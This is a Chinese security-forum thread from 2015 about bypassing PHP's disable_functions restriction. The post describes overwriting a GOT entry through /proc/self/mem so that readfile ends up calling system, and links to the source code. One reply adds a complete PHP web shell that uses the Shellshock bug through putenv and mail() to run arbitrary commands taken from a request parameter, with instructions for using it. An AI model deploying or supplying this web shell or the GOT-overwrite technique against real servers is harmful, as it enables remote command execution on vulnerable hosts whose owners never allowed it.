PHP disable_functions 绕过

  • A+
所属分类:WooYun-Zone

应用条件:

1)内核版本>=2.98 (原文就这样写的)

2)PHP-CGI(或者是PHP-FPM),因为mod_php并没有读取/proc/self/mem

3)代码针对x64编写,要用于x32需要更改。

4)Open_basedir=off(或者能绕过open_basedir读写 /lib/ 和/proc/)

整体思路是通过/proc/self/mem 修改got来劫持库函数调用,似例代码中,将open@got填上了system的地址,通过readfile来调用system执行系统命令,劫持这个调用调用的副作用就是这个php worker进程会被搞坏,因为下一次worker执行文件php的时候会先调用open来读取文件……

限制:

需要fopen,fread,fwrite这样的函数没有被disable,需要用来改内存嘛。

源码:http://pastebin.com/raw.php?i=1saPcTCV

from: https://rdot.org/forum/showthread.php?t=3309

来源:http://bobao.360.cn/learning/detail/225.html

  1. 1#

    默秒全 | 2015-01-29 19:12

    很吊的样子  先看看

  2. 2#

    孤月寒城 (握了棵草) | 2015-01-29 19:47

    很叼的样子  先看看

  3. 3#
    感谢(2)

    Fishmeal | 2015-01-29 19:53

    很叼的样子  先看看

  4. 4#

    泳少 (此号被射!by U神) | 2015-01-29 19:53

    很叼的样子  先看看

  5. 5#

    HackBraid | 2015-01-29 20:29

    很叼的样子  先看看

  6. 6#

    从容 (@寂寞的瘦子 其实是个死胖子!) | 2015-01-29 20:31

    源姐好叼

  7. 7#

    寂寞的瘦子 (傻逼了。。) | 2015-01-29 21:31

    @从容 @sipcer 这就是猿姐?

  8. 8#
    感谢(1)

    tnt1200 (:‮(()())) | 2015-01-29 21:52

    源姐好叼

  9. 9#

    todaro (学习装逼) | 2015-01-29 22:01

    原来这就是媛姐小童鞋啊。

  10. 10#
    感谢(1)

    rains | 2015-01-30 00:01

    很叼啊。

  11. 11#

    从容 (@寂寞的瘦子 其实是个死胖子!) | 2015-01-30 03:53

    @寂寞的瘦子 是啊

  12. 12#

    麻辣烫 | 2015-01-30 11:55

    姐,你这样能行么。你的脸还是那么华润么?想想都恐怖~

  13. 13#

    GaRY | 2015-01-30 15:09

    这是个好思路,感觉像是写过rootkit的人做的事情。

  14. 14#

    小森森 (学习中……) | 2015-01-31 11:08

    Orz…

  15. 15#

    我还爱 (我还是那个我,我还爱那个我) | 2015-01-31 11:17

    <?php
    function wtf($cmd) {
       $tmp = tempnam(".","data");
       putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
       mail("[email protected]","","","","-bv");
       $output = @file_get_contents($tmp);
       @unlink($tmp);
       if($output != "") return $output;
       else return "No output, or not vuln.";
    }
    echo wtf($_REQUEST["cmd"]);
    ?>

    这个也不错,无视所有的disable_functions,但有一个条件就是有shellshock bug,现在还是有很多服务器没有修复的。
    使用方法:http://xxx.com/xxx.php?cmd=<unix command>

  16. 16#

    我还爱 (我还是那个我,我还爱那个我) | 2015-01-31 11:32

    内核版本>=2.98 这个是作者的笔误吧
    应该是>=2.6.8才对了。

  17. 17#

    存在敏感词 (昵称存在敏感词) | 2015-01-31 11:57

    @我还爱 貌似确实是笔误,膜拜一下大牛